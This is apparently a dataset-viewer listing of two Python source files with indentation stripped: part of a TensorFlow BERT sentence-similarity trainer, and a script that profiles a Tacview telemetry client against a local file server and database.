tf.compat.v1.logging.info("*** Example ***")
tf.compat.v1.logging.info("guid: %s" % (example.guid))
tf.compat.v1.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.compat.v1.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.compat.v1.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.compat.v1.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
tf.compat.v1.logging.info("label: %s (id = %d)" % (example.label, label_id))
feature = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id)
return feature
def file_based_convert_examples_to_features(self, examples, label_list, max_seq_length, tokenizer, output_file):
"""Convert a set of `InputExample`s to a TFRecord file."""
writer = tf.io.TFRecordWriter(output_file)
for (ex_index, example) in enumerate(examples):
if ex_index % 10000 == 0:
tf.compat.v1.logging.info("Writing example %d of %d" % (ex_index, len(examples)))
feature = self.convert_single_example(ex_index, example, label_list,
max_seq_length, tokenizer)
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
features = collections.OrderedDict()
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
features["label_ids"] = create_int_feature([feature.label_id])
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
writer.write(tf_example.SerializeToString())
def file_based_input_fn_builder(self, input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
name_to_features = {
"input_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.io.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"label_ids": tf.io.FixedLenFeature([], tf.int64),
}
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.io.parse_single_example(serialized=record, features=name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.cast(t, dtype=tf.int32)
example[name] = t
return example
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.data.experimental.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
return d
return input_fn
def train(self):
if self.mode is None:
raise ValueError("Please set the 'mode' parameter")
bert_config = modeling.BertConfig.from_json_file(args.config_name)
if args.max_seq_len > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(args.max_seq_len, bert_config.max_position_embeddings))
tf.io.gfile.makedirs(args.output_dir)
label_list = self.processor.get_labels()
train_examples = self.processor.get_train_examples(args.data_dir)
num_train_steps = int(len(train_examples) / args.batch_size * args.num_train_epochs)
estimator = self.get_estimator()
train_file = os.path.join(args.output_dir, "train.tf_record")
self.file_based_convert_examples_to_features(train_examples, label_list, args.max_seq_len, self.tokenizer,
train_file)
tf.compat.v1.logging.info("***** Running training *****")
tf.compat.v1.logging.info(" Num examples = %d", len(train_examples))
tf.compat.v1.logging.info(" Batch size = %d", args.batch_size)
tf.compat.v1.logging.info(" Num steps = %d", num_train_steps)
train_input_fn = self.file_based_input_fn_builder(input_file=train_file, seq_length=args.max_seq_len,
is_training=True,
drop_remainder=True)
# early_stopping = tf.contrib.estimator.stop_if_no_decrease_hook(
# estimator,
# metric_name='loss',
# max_steps_without_decrease=10,
# min_steps=num_train_steps)
# estimator.train(input_fn=train_input_fn, hooks=[early_stopping])
estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)
def eval(self):
if self.mode is None:
raise ValueError("Please set the 'mode' parameter")
eval_examples = self.processor.get_dev_examples(args.data_dir)
eval_file = os.path.join(args.output_dir, "eval.tf_record")
label_list = self.processor.get_labels()
self.file_based_convert_examples_to_features(
eval_examples, label_list, args.max_seq_len, self.tokenizer, eval_file)
tf.compat.v1.logging.info("***** Running evaluation *****")
tf.compat.v1.logging.info(" Num examples = %d", len(eval_examples))
tf.compat.v1.logging.info(" Batch size = %d", self.batch_size)
eval_input_fn = self.file_based_input_fn_builder(
input_file=eval_file,
seq_length=args.max_seq_len,
is_training=False,
drop_remainder=False)
estimator = self.get_estimator()
result = estimator.evaluate(input_fn=eval_input_fn, steps=None)
output_eval_file = os.path.join(args.output_dir, "eval_results.txt")
with tf.io.gfile.GFile(output_eval_file, "w") as writer:
tf.compat.v1.logging.info("***** Eval results *****")
for key in sorted(result.keys()):
tf.compat.v1.logging.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
def predict(self, sentence1, sentence2):
if self.mode is None:
raise ValueError("Please set the 'mode' parameter")
self.input_queue.put([(sentence1, sentence2)])
prediction = self.output_queue.get()
return prediction
if __name__ == '__main__':
sim = BertSim()
sim.set_mode(tf.estimator.ModeKeys.TRAIN)
sim.train()
sim.set_mode(tf.estimator.ModeKeys.EVAL)
sim.eval()
# sim.set_mode(tf.estimator.ModeKeys.PREDICT)
# while True:
# sentence1 = input('sentence1: ')
# sentence2 = input('sentence2: ')
# predict = sim.predict(sentence1, sentence2)
# print(f'similarity:{predict[0][1]}')
|
profile_tac_consumer.py
|
#!/usr/bin/env python
import argparse
import asyncio
from functools import partial
from multiprocessing import Process
import sys
from pathlib import Path
import yappi # type: ignore
sys.path.append(str(Path(".").parent.absolute().joinpath("tacview_client")))
sys.path.append(str(Path(".").parent.absolute().joinpath("tests")))
import client, db, config, serve_file # type: ignore
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--iters", type=int, default=50000, help="Number of lines to read"
)
parser.add_argument(
"--profile", action="store_true", help="Set this flag to run yappi profiler"
)
parser.add_argument(
"--filename", type=Path, required=True, help="Filename to process"
)
parser.add_argument(
"--batch_size",
required=False,
type=int,
default=500000,
help="Number of records to be combined in write batches",
)
parser.add_argument(
"--debug", action="store_true", help="Should we run in debug mode?"
)
args = parser.parse_args()
server_proc = Process(
target=partial(serve_file.main, filename=args.filename, port=5555)
)
server_proc.start()
db.drop_tables()
db.create_tables()
if args.profile:
yappi.set_clock_type("cpu")
yappi.start(builtins=True)
client.main(
host="127.0.0.1",
port=5555,
debug=args.debug,
max_iters=args.iters,
batch_size=args.batch_size,
dsn=config.DB_URL,
)
if not args.profile:
asyncio.run(client.check_results())
server_proc.terminate() # type: ignore
if args.profile:
prof_filename = "callgrind.tacview.prof"
stats = yappi.get_func_stats()
stats.sort("ttot", "asc")
stats.save(prof_filename, type="callgrind") # type: ignore
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.